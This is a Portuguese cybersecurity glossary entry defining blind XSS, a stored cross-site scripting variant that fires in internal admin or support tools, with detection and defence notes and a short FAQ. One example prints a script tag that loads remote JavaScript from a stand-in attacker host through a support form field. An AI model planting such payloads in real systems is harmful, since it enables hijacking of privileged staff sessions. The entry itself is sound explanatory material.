Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 122

XSS Cego

Revisado porCybersecurity entrepreneur & security researcher

O que é XSS Cego?

XSS CegoVariante de XSS armazenado em que a carga útil dispara num contexto que o atacante não consegue ver, geralmente um painel administrativo interno.


O XSS cego é uma subclasse do XSS armazenado em que o script malicioso não executa no navegador do atacante, mas num contexto diferente, normalmente privilegiado — a visualização de um ticket de suporte, uma consola de revisão de fraude, um painel interno ou um relatório de backup. O atacante submete a carga através de um formulário público (contacto, registo, suporte) e aguarda que um utilizador interno renderize os dados. A deteção depende de callbacks fora de banda: a carga exfiltra informações para XSS Hunter, Burp Collaborator ou um servidor DNS/HTTP próprio. As defesas são as do XSS armazenado mais uma CSP rigorosa nas ferramentas internas.

Exemplos

  1. 01

    Um campo de formulário de suporte com <script src=https://x.atacante/x.js></script> que executa no CRM do agente.

  2. 02

    Um cabeçalho User-Agent registado num visualizador de logs administrativo que não codifica HTML.

Perguntas frequentes

O que é XSS Cego?

Variante de XSS armazenado em que a carga útil dispara num contexto que o atacante não consegue ver, geralmente um painel administrativo interno. Pertence à categoria Ataques e ameaças da cibersegurança.

O que significa XSS Cego?

Variante de XSS armazenado em que a carga útil dispara num contexto que o atacante não consegue ver, geralmente um painel administrativo interno.

Como se defender contra XSS Cego?

As defesas contra XSS Cego costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.

Quais são outros nomes para XSS Cego?

Nomes alternativos comuns: XSS fora de banda.

Termos relacionados